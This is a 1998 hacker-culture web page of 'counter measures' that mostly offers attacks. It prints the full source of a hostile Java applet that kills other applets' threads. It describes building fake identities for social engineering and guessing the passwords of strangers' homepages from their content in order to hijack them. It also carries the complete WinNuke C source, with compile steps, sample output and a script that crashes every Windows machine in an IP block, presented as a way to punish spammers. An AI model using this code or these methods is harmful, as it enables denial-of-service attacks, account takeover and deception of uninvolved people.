C
O
U
M
E
S



fravia's
counter
measures
page


Fravia's Nofrill
Web design
(1998)
 

updated
July 1998
noanon
Fravia's Counter measures

Learn how to defend yourself

(Some useful tricks)
~
Applets killers |
Fake identities | Homepages low capering | Enemy studying |
Spammers nuking | Powersearching
 

let's hope it does not suck!

Based on some private emailings from +ORC

"...these days, on the Web, you'll never be too careful,

travel always through your cloack identities and with your 

applets killer on, keep your cache empty, watch out for cookies 

and do not bump too oft on wizard sites... Work well, +ORC"


This page was started on 12 Nov 96 and is under slow construction

__Applets killers__

We have already seen on my anon page that Javascript applets can be used to forge faked address and other nasty activities on unsuspecting browsers... here is the code of LaDue's appletskiller
/* This hostile applet stops any applets that are running and kills any other applets that are downloaded. */ import java.applet.*; import java.awt.*; import java.io.*; public class AppletKiller extends java.applet.Applet implements Runnable { Thread killer; public void init() { killer = null; } public void start() { if (killer == null) { killer = new Thread(this,&quot;killer&quot;); killer.setPriority(Thread.MAX_PRIORITY); killer.start(); } } public void stop() {} // Kill all threads except this one public void run() { try { while (true) { ThreadKiller.killAllThreads(); try { killer.sleep(100); } catch (InterruptedException e) {} } } catch (ThreadDeath td) {} // Resurrect the hostile thread in case of accidental ThreadDeath finally { AppletKiller ack = new AppletKiller(); Thread reborn = new Thread(ack, &quot;killer&quot;); reborn.start(); } } } class ThreadKiller { // Ascend to the root ThreadGroup and list all subgroups recursively, // killing all threads as we go public static void killAllThreads() { ThreadGroup thisGroup; ThreadGroup topGroup; ThreadGroup parentGroup; // Determine the current thread group thisGroup = Thread.currentThread().getThreadGroup(); // Proceed to the top ThreadGroup topGroup = thisGroup; parentGroup = topGroup.getParent(); while(parentGroup != null) { topGroup = parentGroup; parentGroup = parentGroup.getParent(); } // Find all subgroups recursively findGroups(topGroup); } private static void findGroups(ThreadGroup g) { if (g == null) {return;} else { int numThreads = g.activeCount(); int numGroups = g.activeGroupCount(); Thread[] threads = new Thread[numThreads]; ThreadGroup[] groups = new ThreadGroup[numGroups]; g.enumerate(threads, false); g.enumerate(groups, false); for (int i = 0; i <NUMTHREADS; i++) killOneThread(threads[i]); for (int i="0;" i < numGroups; i++) findGroups(groups[i]); } } private static void killOneThread(Thread t) { if (t="=" null || t.getName().equals("killer")) {return;} else {t.stop();} } }
Well yes, you should learn a little Java my dear

back to the top of this nice page

__Fake Identities__

Having many identities (Avatars) is of paramount importance on the Web. You should use faked identities for most activities, a good idea is to have identities in different languages (say being a german law student, a french volleyball enthusiast, and an american young Boy scout). You'll be able to get as many identities as you need using all the services that provide (per telnet) email addresses for free, like hotmail.com... but a much better (and raccomanded) method is the homepage capering I describe below. As soon as you have your fake email address, set up a free web page (on Angelfire for instance, but there are now many more free page providers on the Web, and you can get a 5 Megabyte free page on many new free european providers). Be creative and use a "front" page that would not arise any suspect (put up a nice foto you found somewhere on the Web with "Me and my Dog Barkie" and this kind of junk stuff). Rememeber that the Web is still growing exponentially and that MILLION of pages appear and disappear every DAY! No censor's robot or spider can really follow what's going on (fortunately).
The Web is immense and the chances are on our side. If you only spent a minute per page and devoted ten hours a day to it, it would take four and a half years to explore a million Web pages, a lifetime to explore just a part of it, an automated search engine can do the same in two days, but in the same time quite a lot of these pages will have been changed/moved/migrated
Once you have some identities (say three or four) remember that:
- Your Avatars interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only english use at least different language patterns, say university professor as A and lorry driver as B)

What's the point of having many identities?
You'll need the AVatars to practicise some nice Web activities (offensive and defensive)
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a target)
- intranet activities (see below)
- homepage high capering (see below)

back to the
top of this nice page

Homepages ("low") capering

For simple capering you do not even need a fake identity and you may practicize it on many "easy" targets on the net. Capering is one of the best methods to conceal your identity: use following approach:
- Find a free page provider with easy password validation scheme (say Angelfire, but also Geocities and Mygale can be used)
- Read many pages of people that are NOT computer experts and that do NOT update very oft (if ever)... you may be able to find the updating schedule on the free provider's pages.
- Let's say that the content of three such pages is the following: "Me and my dog Bertie", This page is a tribute to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona and Lollypop.
You'll get -on average- one bingo out of 15 tryes. Now you got some pages belonging to somebody else: do some of the following (mixing the points as needs be):
1) Do not change the page, change only the password and leave it alone for a couple of months
and/or
2) Migrate immediatly to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not completely) use as
- "Depot" pages
- "Dormient" pages
- "Trap" (Luring) pages
For your own "intranet" (sort of, see below)



back to the
top of this nice page

__Enemy identification__

Know your enemies! (How to gather informations on the Web)
You'll find a first approach on the ad hoc
enemy page

__How to Nuke spammers__


a nice fine c program (Winnuke) by _eci... listing at the end of this section

How to use WinNuke to get rid of spammers





winnuke.c is a program which will crash any Windows 95/NT machine.  Since

this operating system is popular among spammers, winnuke makes it easy to

get rid of them.



First, take the program code from the bottom of this post (everything

after the ---Cut Here--- line) and save it to a text file called winnuke.c

on your shell account or Linux box.



Now compile it by typing:

     gcc winnuke.c -o winnuke

If you have SunOS, you may need to use this command instead:

     gcc winnuke.c -lsocket -lnsl -o winnuke



You should now have an executable program called winnuke in your directory.

Now find the spammer's IP number.  This is the first IP number in the mail

headers which is not your mail server or mail relay.  Once you have the

spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109

except use the spammer's real IP number that you found.  You should see

something like the following:



% ./winnuke 192.168.12.109

Connected to [192.168.12.109:139].

Sending crash... Done!

% 



Congratulations!  You just nuked a spammer!  Give yourself a pat on the

back.  You can ping the IP address to verify that it is actually down.



If it doesn't work...

Unfortunately a few spammers don't have just one IP address but a whole

block (255 addresses)  In this case you will need to nuke the entire block.

To do this, use this script:



#!/bin/csh

@ number = 255

loop:

@ number = $number - 1

./winnuke 205.199.212.$number &

#sleep 1

if ($number > 1) then

  goto loop

endif



Except you should use the first three bytes of the spammer's IP number

instead of 205.199.212.  If your net connection is too slow, uncomment the

sleep command (line 6) and that will slow it down so it can get all the

packets out.  That's it...

---Cut Here--- /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */ #include <STDIO.h> #include <STRING.h> #include <NETDB.h> #include <NETINET/IN.h> #include <SYS/TYPES.h> #include <SYS/SOCKET.h> #include <UNISTD.h> #define dport 139 /* Attack port: 139 is what we want */ int x, s; char *str = &quot;Bye&quot;; /* Makes no diff */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&amp;blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he-&gt;h_addr, (char *)&amp;blah.sin_addr, he-&gt;h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) <0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)="=-1)" { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc !="2)" { printf("Usage: %s <target>\n&quot;,argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror(&quot;socket()&quot;); exit(-1); } open_sock(s,argv[1],dport); printf(&quot;Sending crash... &quot;); send(s,str,strlen(str),MSG_OOB); usleep(500000); printf(&quot;Done!\n&quot;); close(s); }
nice, isn't it?

__Real powersearch__


You believe that searching the web is just using AltaVista, Hotbot and the other search engines? (Which you'll all find red
here btw).

You are wrong: there are (at least) three other possibilities:

1) Searching per email, see my lessons:

Fravia's own lessons
[Available lessons:]

redlesson_5 ~ General use of agora, http:// retrieving ~ July 1996 ~ complete
redlesson_6 ~ Ftping files, agora queries and emailing altavista ~ December 1996 ~ complete
redlesson_7 ~ W3gate, search spiders, error messages and evaluation of results ~ March 1997 ~ complete
redlesson_8 ~ Advanced searching techniques (combing and klebing) ~ November 1997 ~ complete
redlesson_9 ~ Searching effectively ~ Site monitoring ~ January 1998 ~ complete
redlesson_10 ~ Let the bots search for you ~ and build your own search-bots :-) ~ June 1998 ~ 'light'


2) Searching through own robots/spiders, you'll find material on this here.
3) Using the searches that OTHERS have made! (combing)
I divide this field in "usenet combing" and "topsites combing"

I have started working on this in March 1997, and I don't think you'll find it somewhere else!
(c) fravia :-)

Usenet combing is preferably made through simple email (never underestimate the POWER of email for internet investigating matters):

To:	 	Email-Queries@Reference.COM

Subject:	(None)

Text:		FIND search AND engines

Try it now, You'll get an answer in circa half an hour.

Another possibility is through an Agora's "news:" command:

To:		agora@dna.affrc.go.jp

Subject:	(None)

Text:		send news:alt.anonymous

Try it now, You'll get an answer in circa 10 minutes.

Topsites combing is very useful to find quickly "delicate" subjects, like warez and free "images". You don't do it obviously on newsgroups (where you'll always find only an infinite list of "me-too" lusers). You'll go instead, for instance straight to
red Web-Counter
Where you'll have a look at the "Top 1000" pages

and Websidestory
red The World Top 1000 Pages Where you'll have a look at the Top 1000 "hackers" page (for instance).
The same applies for the "normal" search engines and for many other "counters" on the web. As soon as you "see" a new counter somewhere, check immediately if there is a "top 1000" option, and wade happily through tons of information!


Enjoy!


back to the top of this nice page

Page unfinished, rough and under heavy construction since november 1996!


redhomepage redlinks red+ORC redbots wars redstudents' essays redcounter measures
redbots wars redantismut CGI tricks redacademy database redtools redjavascript tricks
redcocktails redsearch_forms redmail_fravia+
redIs software reverse engineering illegal?

red(c) Fravia, 1995, 1996, 1997, 1998. All rights reserved, in the European Union and elsewhere